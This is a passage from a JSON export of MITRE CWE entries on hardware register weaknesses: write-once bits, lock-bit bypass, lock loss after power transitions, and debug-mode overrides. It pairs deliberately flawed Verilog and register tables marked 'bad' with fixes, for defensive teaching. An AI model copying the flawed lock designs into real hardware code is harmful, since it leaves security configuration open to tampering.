value.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:div":{"#text":"module register_write_once_example(input [15:0] Data_in,input Clk,input ip_resetn,input global_resetn,input write,output reg [15:0] Data_out);reg Write_once_status;always @(posedge Clk or negedge ip_resetn)if (~ip_resetn)beginData_out &lt;= 16\'h0000;Write_once_status &lt;= 1\'b0;endelse if (write &amp; ~Write_once_status)beginData_out &lt;= Data_in &amp; 16\'hFFFE; // Input data written to register after masking bit 0Write_once_status &lt;= 1\'b1; // Write once status set after first write.endelse if (~write)beginData_out[15:1] &lt;= Data_out[15:1];Data_out[0] &lt;= Write_once_status;endendmodule","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","","","","","","",""]}},{"attr":{"@_Nature":"informative"},"xhtml:div":{"#text":"Trusted firmware or software trying to set the write-once field.- Must confirm the Write_once_status (bit 0) value is zero, before programming register. If another agent has programmed the register before, then Write_once_status value will be one.- After writing to the register, the trusted software can issue a read to confirm that the valid setting has been programmed.","xhtml:br":["",""]}}],"Body_Text":"The first system component that sends a write cycle to this register can program the value. This could result in a race condition security issue in SoC design, if an untrusted agent is running in the system in parallel with the trusted component that is expected to program the register."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"26"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-12-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1224":{"attr":{"@_ID":"1224","@_Name":"Improper Restriction of Write-Once Bit Fields","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The hardware design control register \\"sticky bits\\" or write-once bit fields are improperly implemented, such that they can be reprogrammed by software.","Extended_Description":{"xhtml:p":["Integrated circuits and hardware IP software programmable controls and settings are commonly stored in register circuits. These register contents have to be initialized at hardware reset to define default values that are hard coded in the hardware description language (HDL) code of the hardware unit. A common security protection method used to protect register settings from modification by software is to make the settings write-once or \\"sticky.\\" This allows writing to such registers only once, whereupon they become read-only. This is useful to allow initial boot software to configure systems settings to secure values while blocking runtime software from modifying such hardware settings.","Failure to implement write-once restrictions in hardware design can expose such registers to being re-programmed by software and written multiple times. For example, write-once fields could be implemented to only be write-protected if they have been set to value \\"1\\", wherein they would work as \\"write-1-once\\" and not \\"write-once\\"."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}}],"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"Such issues could be introduced during implementation of hardware design, since IP parameters and defaults are defined in HDL code and identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":"Varies by Context","Note":"System configuration cannot be programmed in a secure way."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"During hardware design all register write-once or sticky fields must be evaluated for proper configuration."},{"Phase":"Testing","Description":"The testing phase should use automated tools to test that values are not reprogrammable and that write-once fields lock on writing zeros."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider the example design module system verilog code shown below. register_write_once_example module is an example of register that has a write-once field defined. Bit 0 field captures the write_once_status value. This implementation can be for a register that is defined by specification to be a write-once register, since the write_once_status field gets written by input data bit 0 on first write.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:div":{"#text":"module register_write_once_example(input [15:0] Data_in,input Clk,input ip_resetn,input global_resetn,input write,output reg [15:0] Data_out);reg Write_once_status;always @(posedge Clk or negedge ip_resetn)if (~ip_resetn)beginData_out &lt;= 16\'h0000;Write_once_status &lt;= 1\'b0;endelse if (write &amp; ~Write_once_status)beginData_out &lt;= Data_in &amp; 16\'hFFFE;Write_once_status &lt;= Data_in[0]; // Input bit 0 sets Write_once_statusendelse if (~write)beginData_out[15:1] &lt;= Data_out[15:1];Data_out[0] &lt;= Write_once_status;endendmodule","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","","","","","",""]}},{"attr":{"@_Nature":"informative"},"xhtml:div":{"#text":"module register_write_once_example(input [15:0] Data_in,input Clk,input ip_resetn,input global_resetn,input write,output reg [15:0] Data_out);reg Write_once_status;always @(posedge Clk or negedge ip_resetn)if (~ip_resetn)beginData_out &lt;= 16\'h0000;Write_once_status &lt;= 1\'b0;endelse if (write &amp; ~Write_once_status)beginData_out &lt;= Data_in &amp; 16\'hFFFE;Write_once_status &lt;= 1\'b1; // Write once status set on first write, independent of inputendelse if (~write)beginData_out[15:1] &lt;= Data_out[15:1];Data_out[0] &lt;= Write_once_status;endendmodule","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","","","","","",""]}}],"Body_Text":"The above example only locks further writes if write_once_status bit is written to one. So it acts as write_1-Once instead of the write-once attribute."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-12-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1229":{"attr":{"@_ID":"1229","@_Name":"Creation of Emergent Resource","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product manages resources or behaves in a way that indirectly creates a new, distinct resource that can be used by attackers in violation of the intended policy.","Extended_Description":{"xhtml:p":"A product is only expected to behave in a way that was specifically intended by the developer.  Resource allocation and management is expected to be performed explicitly by the associated code.  However, in systems with complex behavior, the product might indirectly produce new kinds of resources that were never intended in the original design.  For example, a covert channel is a resource that was never explicitly intended by the developer, but it is useful to attackers.  \\"Parasitic computing,\\" while not necessarily malicious in nature, effectively tricks a product into performing unintended computations on behalf of another party."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1049"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-01-22"}}},"1230":{"attr":{"@_ID":"1230","@_Name":"Exposure of Sensitive Information Through Metadata","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product prevents direct access to a resource containing sensitive information, but it does not sufficiently limit access to metadata that is derived from the original, sensitive information.","Extended_Description":{"xhtml:p":"Developers might correctly prevent unauthorized access to a database or other resource containing sensitive information, but they might not consider that portions of the original information might also be recorded in metadata, search indices, statistical reports, or other resources.  If these resources are not also restricted, then attackers might be able to extract some or all of the original information, or otherwise infer some details.  For example, an attacker could specify search terms that are known to be unique to a particular person, or view metadata such as activity or creation dates in order to identify usage patterns."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-01-26"}}},"1231":{"attr":{"@_ID":"1231","@_Name":"Improper Prevention of Lock Bit Modification","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product uses a trusted lock bit for restricting access to registers, address regions, or other resources, but the product does not prevent the value of the lock bit from being modified after it has been set.","Extended_Description":{"xhtml:p":["In integrated circuits and hardware\\n\\t\\t\\t  intellectual property (IP) cores, device configuration\\n\\t\\t\\t  controls are commonly programmed after a device power\\n\\t\\t\\t  reset by a trusted firmware or software module (e.g.,\\n\\t\\t\\t  BIOS/bootloader) and then locked from any further\\n\\t\\t\\t  modification.","This behavior is commonly implemented using a trusted lock bit. \\n\\t\\t\\t  When set, the lock bit disables writes to a protected set of\\n\\t\\t\\t  registers or address regions. Design or coding errors in\\n\\t\\t\\t  the implementation of the lock bit protection feature\\n\\t\\t\\t  may allow the lock bit to be modified or cleared by\\n\\t\\t\\t  software after it has been set. Attackers might be able to unlock the system and\\n\\t\\t\\t  features that the bit is intended to protect."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during implementation and identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Modify Memory","Likelihood":"High","Note":"Registers protected by lock bit can be modified even when lock is set."}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Analysis","Description":"Set the lock bit. Power cycle the\\n\\t     device. Attempt to clear the lock bit.  If the\\n\\t     information is changed, implement a design\\n\\t     fix. Retest. Also, attempt to indirectly clear the lock\\n\\t     bit or bypass it.","Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation","Testing"],"Description":{"xhtml:ul":{"xhtml:li":["Security lock bit protections must be reviewed for design inconsistency and common weaknesses.","Security lock programming flow and lock properties must be tested in pre-silicon and post-silicon testing."]}},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider the example design below for a digital thermal sensor that detects overheating of the silicon and triggers system shutdown. The system critical temperature limit (CRITICAL_TEMP_LIMIT) and thermal sensor calibration (TEMP_SENSOR_CALIB) data have to be programmed by firmware, and then the register needs to be locked (TEMP_SENSOR_LOCK).","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["CRITICAL_TEMP_LIMIT",{"#text":"[31:8] Reserved field; Read only; Default 0[7:0] Critical temp 0-255 Centigrade; Read-write-lock; Default 125","xhtml:p":""}]},{"xhtml:td":["TEMP_SENSOR_CALIB","[31:0] Thermal sensor calibration data. Slope value used to map sensor reading to degrees Centigrade."]},{"xhtml:td":["TEMP_SENSOR_LOCK",{"#text":"[31:1] Reserved field; Read only; Default 0[0] Lock bit, locks CRITICAL_TEMP_LIMIT and TEMP_SENSOR_CALIB registers; Write-1-once; Default 0","xhtml:p":""}]},{"xhtml:td":["TEMP_HW_SHUTDOWN",{"#text":"[31:2] Reserved field; Read only; Default 0[1] Enable hardware shutdown on critical temperature detection; Read-write; Default 0","xhtml:p":""}]},{"xhtml:td":["CURRENT_TEMP",{"#text":"[31:8] Reserved field; Read only; Default 0[7:0] Current Temp 0-255 Centigrade; Read-only; Default 0","xhtml:p":""}]}]}},{"attr":{"@_Nature":"good"},"xhtml:p":"To fix this weakness, one could change the TEMP_HW_SHUTDOWN field to be locked by TEMP_SENSOR_LOCK.","xhtml:table":{"xhtml:tr":{"xhtml:td":["TEMP_HW_SHUTDOWN",{"#text":"[31:2] Reserved field; Read only; Default 0[1] Enable hardware shutdown on critical temperature detection; Read-write-Lock; Default 0[0] Locked by TEMP_SENSOR_LOCK","xhtml:p":["",""]}]}}}],"Body_Text":"In this example, note that if the system heats to critical temperature, the response of the system is controlled by the TEMP_HW_SHUTDOWN bit [1], which is not lockable. Thus, the intended security property of the critical temperature sensor cannot be fully protected, since software can misconfigure the TEMP_HW_SHUTDOWN register even after the lock bit is set to disable the shutdown response."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2017-6283","Description":"chip reset clears critical read/write lock permissions for RSA function","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6283"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-01-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Contribution":[{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Narasimha Kumar V Mangipudi","Contribution_Organization":"Lattice Semiconductor","Contribution_Date":"2021-10-20","Contribution_Comment":"reviewed content changes"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Hareesh Khattri","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-22","Contribution_Comment":"provided observed example"}]}},"1232":{"attr":{"@_ID":"1232","@_Name":"Improper Lock Behavior After Power State Transition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Register lock bit protection disables changes to system configuration once the bit is set. Some of the protected registers or lock bits become programmable after power state transitions (e.g., Entry and wake from low power sleep modes) causing the system configuration to be changeable.","Extended_Description":{"xhtml:p":["Devices may allow device configuration controls which need to be programmed after device power reset via a trusted firmware or software module (commonly set by BIOS/bootloader) and then locked from any further modification. This action is commonly implemented using a programmable lock bit, which, when set, disables writes to a protected set of registers or address regions.","After a power state transition, the lock bit is set to unlocked. Some common weaknesses that can exist in such a protection scheme are that the lock gets cleared, the values of the protected registers get reset, or the lock become programmable."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Modify Memory","Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation","Testing"],"Description":{"xhtml:ul":{"xhtml:li":["Security Lock bit protections should be reviewed for behavior across supported power state transitions.","Security lock programming flow and lock properties should be tested in pre-silicon and post-silicon testing including testing across power transitions."]}},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Consider the memory configuration settings of a system that uses DDR3 DRAM memory. Protecting the DRAM memory configuration from modification by software is required to ensure that system memory access control protections cannot be bypassed. This can be done by using lock bit protection that locks all of the memory configuration registers. The memory configuration lock can be set by the BIOS during the boot process.","If such a system also supports a rapid power on mode like hibernate, the DRAM data must be saved to a disk before power is removed and restored back to the DRAM once the system powers back up and before the OS resumes operation after returning from hibernate."]},"Body_Text":"To support the hibernate transition back to the operating state, the DRAM memory configuration must be reprogrammed even though it was locked previously. As the hibernate resume does a partial reboot, the memory configuration could be altered before the memory lock is set. Functionally the hibernate resume flow requires a bypass of the lock-based protection. The memory configuration must be securely stored and restored by trusted system firmware. Lock settings and system configuration must be restored to the same state it was in before the device entered into the hibernate mode."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"166"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-01-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description"}]}},"1233":{"attr":{"@_ID":"1233","@_Name":"Security-Sensitive Hardware Controls with Missing Lock Bit Protection","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product uses a register lock bit protection mechanism, but it does not ensure that the lock bit prevents modification of system registers or controls that perform changes to important hardware system configuration.","Extended_Description":{"xhtml:p":["Integrated circuits and hardware intellectual properties (IPs) might provide device configuration controls that need to be programmed after device power reset by a trusted firmware or software module, commonly set by BIOS/bootloader. After reset, there can be an expectation that the controls cannot be used to perform any further modification. This behavior is commonly implemented using a trusted lock bit, which can be set to disable writes to a protected set of registers or address regions. The lock protection is intended to prevent modification of certain system configuration (e.g., memory/memory protection unit configuration).","However, if the lock bit does not effectively write-protect all system registers or controls that could modify the protected system configuration, then an adversary may be able to use software to access the registers/controls and modify the protected hardware configuration."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during implementation and identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Modify Memory","Note":"System Configuration protected by the lock bit can be modified even when the lock is set."}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Analysis","Description":"Set the lock bit. Attempt to modify the\\n\\t     information protected by the lock bit. If the information\\n\\t     is changed, implement a design fix. Retest. Also, attempt\\n\\t     to indirectly clear the lock bit or bypass\\n\\t     it.","Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation","Testing"],"Description":{"xhtml:ul":{"xhtml:li":["Security lock bit protections must be reviewed for design inconsistency and common weaknesses.","Security lock programming flow and lock properties must be tested in pre-silicon and post-silicon testing."]}}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider the example design below for a digital thermal sensor that detects overheating of the silicon and triggers system shutdown. The system critical temperature limit (CRITICAL_TEMP_LIMIT) and thermal sensor calibration (TEMP_SENSOR_CALIB) data have to be programmed by the firmware.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["CRITICAL_TEMP_LIMIT",{"#text":"[31:8] Reserved field; Read only; Default 0[7:0] Critical temp 0-255 Centigrade; Read-write-lock; Default 125","xhtml:p":""}]},{"xhtml:td":["TEMP_SENSOR_CALIB","[31:0] Thermal sensor calibration data. A slope value used to map sensor reading to a degree Centigrade. Read-write; Default 25"]},{"xhtml:td":["TEMP_SENSOR_LOCK",{"#text":"[31:1] Reserved field; Read only; Default 0[0] Lock bit, locks CRITICAL_TEMP_LIMIT register; Write-1-once; Default 0","xhtml:p":""}]},{"xhtml:td":["TEMP_HW_SHUTDOWN",{"#text":"[31:2] Reserved field; Read only; Default 0[1] Enable hardware shutdown on a critical temperature detection; Read-write; Default 0","xhtml:p":""}]},{"xhtml:td":["CURRENT_TEMP",{"#text":"[31:8] Reserved field; Read only; Default 0[7:0]   Current Temp 0-255 Centigrade; Read-only; Default 0","xhtml:p":""}]}]}},{"attr":{"@_Nature":"good"},"xhtml:p":"Change TEMP_HW_SHUTDOWN and TEMP_SENSOR_CALIB controls to be locked by TEMP_SENSOR_LOCK.","xhtml:table":{"xhtml:tr":[{"xhtml:td":["TEMP_SENSOR_CALIB","[31:0] Thermal sensor calibration data. A slope value used to map sensor reading to a degree Centigrade. Read-write-Lock; Default 25; Locked by TEMP_SENSOR_LOCK bit[0]"]},{"xhtml:td":["TEMP_HW_SHUTDOWN",{"#text":"[31:2] Reserved field; Read only; Default 0[1] Enable hardware shutdown on critical temperature detection; Read-write-Lock; Default 0; Locked by TEMP_SENSOR_LOCK bit[0]","xhtml:p":""}]}]}}],"Body_Text":{"xhtml:p":["In this example note that only the CRITICAL_TEMP_LIMIT register is protected by the TEMP_SENSOR_LOCK bit, while the security design intent is to protect any modification of the critical temperature detection and response.","The response of the system, if the system heats to a critical temperature, is controlled by TEMP_HW_SHUTDOWN bit [1], which is not lockable. Also, the TEMP_SENSOR_CALIB register is not protected by the lock bit.","By modifying the temperature sensor calibration, the conversion of the sensor data to a degree centigrade can be changed, such that the current temperature will never be detected to exceed critical temperature value programmed by the protected lock.","Similarly, by modifying the TEMP_HW_SHUTDOWN.Enable bit, the system response detection of the current temperature exceeding critical temperature can be disabled."]}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2018-9085","Description":"Certain servers leave a write protection lock bit\\n\\t\\tunset after boot, potentially allowing modification of\\n\\t\\tparts of flash memory.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9085"},{"Reference":"CVE-2014-8273","Description":"Chain: chipset has a race condition (CWE-362) between when an interrupt handler detects an attempt to write-enable the BIOS (in violation of the lock bit), and when the handler resets the write-enable bit back to 0, allowing attackers to issue BIOS writes during the timing window [REF-1237].","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8273"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"176"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1237"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-01-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Contribution":{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Narasimha Kumar V Mangipudi","Contribution_Organization":"Lattice Semiconductor","Contribution_Date":"2021-10-20","Contribution_Comment":"reviewed content changes"}}},"1234":{"attr":{"@_ID":"1234","@_Name":"Hardware Internal or Debug Modes Allow Override of Locks","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"System configuration protection may be bypassed during debug mode.","Extended_Description":{"xhtml:p":"Device configuration controls are commonly programmed after a device power reset by a trusted firmware or software module (e.g., BIOS/bootloader) and then locked from any further modification. This is commonly implemented using a trusted lock bit, which when set, disables writes to a protected set of registers or address regions. The lock protection is intended to prevent modification of certain system configuration (e.g., memory/memory protection unit configuration). If debug features supported by hardware or internal modes/system states are supported in the hardware design, modification of the lock protection may be allowed allowing access and modification of configuration information."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Likelihood":"High","Note":"Bypass of lock bit allows access and modification of system configuration even when the lock bit is set."}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation","Testing"],"Description":{"xhtml:ul":{"xhtml:li":["Security Lock bit protections should be reviewed for any bypass/override modes supported.","Any supported override modes either should be removed or protected using authenticated debug modes.","Security lock programming flow and lock properties should be tested in pre-silicon and post-silicon testing."]}},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"#text":"For example, consider the example Locked_override_register example. This register module supports a lock mode that blocks any writes after lock is set to 1.However, it also allows override of the lock protection when scan_mode or debug_unlocked modes are active.","xhtml:br":""},"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:p":["module Locked_register_example","(",{"#text":"input [15:0] Data_in,","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input Clk,","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input resetn,","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input write,","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input Lock,","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input scan_mode,","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input debug_unlocked,","attr":{"@_style":"text-indent: 15px;"}},{"#text":"output reg [15:0] Data_out","attr":{"@_style":"text-indent: 15px;"}},");","","reg lock_status;","","always @(posedge Clk or negedge resetn)","if (~resetn) // Register is reset resetn",{"#text":"begin","attr":{"@_style":"text-indent: 15px;"}},{"#text":"lock_status &lt;= 1\'b0;","attr":{"@_style":"text-indent: 30px;"}},{"#text":"end","attr":{"@_style":"text-indent: 15px;"}},{"#text":"else if (Lock)","attr":{"@_style":"text-indent: 15px;"}},{"#text":"begin","attr":{"@_style":"text-indent: 15px;"}},{"#text":"lock_status &lt;= 1\'b1;","attr":{"@_style":"text-indent: 30px;"}},{"#text":"end","attr":{"@_style":"text-indent: 15px;"}},{"#text":"else if (~Lock)","attr":{"@_style":"text-indent: 15px;"}},{"#text":"begin","attr":{"@_style":"text-indent: 15px;"}},{"#text":"lock_status &lt;= lock_status","attr":{"@_style":"text-indent: 30px;"}},{"#text":"end","attr":{"@_style":"text-indent: 15px;"}},"","always @(posedge Clk or negedge resetn)",{"#text":"if (~resetn) // Register is reset resetn","attr":{"@_style":"text-indent: 15px;"}},{"#text":"begin","attr":{"@_style":"text-indent: 15px;"}},{"#text":"Data_out &lt;= 16\'h0000;","attr":{"@_style":"text-indent: 30px;"}},{"#text":"end","attr":{"@_style":"text-indent: 15px;"}},{"#text":"else if (write &amp; (~lock_status | scan_mode | debug_unlocked) ) // Register protected by Lock bit input, overrides supported for scan_mode &amp; debug_unlocked","attr":{"@_style":"text-indent: 15px;"}},{"#text":"begin","attr":{"@_style":"text-indent: 15px;"}},{"#text":"Data_out &lt;= Data_in;","attr":{"@_style":"text-indent: 30px;"}},{"#text":"end","attr":{"@_style":"text-indent: 15px;"}},{"#text":"else if (~write)","attr":{"@_style":"text-indent: 15px;"}},{"#text":"begin","attr":{"@_style":"text-indent: 15px;"}},{"#text":"Data_out &lt;= Data_out;","attr":{"@_style":"text-indent: 30px;"}},{"#text":"end","attr":{"@_style":"text-indent: 15px;"}},"","endmodule"]},{"#text":"Either remove the debug and scan mode overrides or protect enabling of these modes so that only trusted and authorized users may enable these modes.","attr":{"@_Nature":"good"}}],"Body_Text":"If either the scan_mode or the debug_unlocked modes can be triggered by software, then the lock protection may be bypassed."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"176"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-01-15"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns"}}},"1235":{"attr":{"@_ID":"1235","@_Name":"Incorrect Use of Autoboxing and Unboxing for Performance Critical 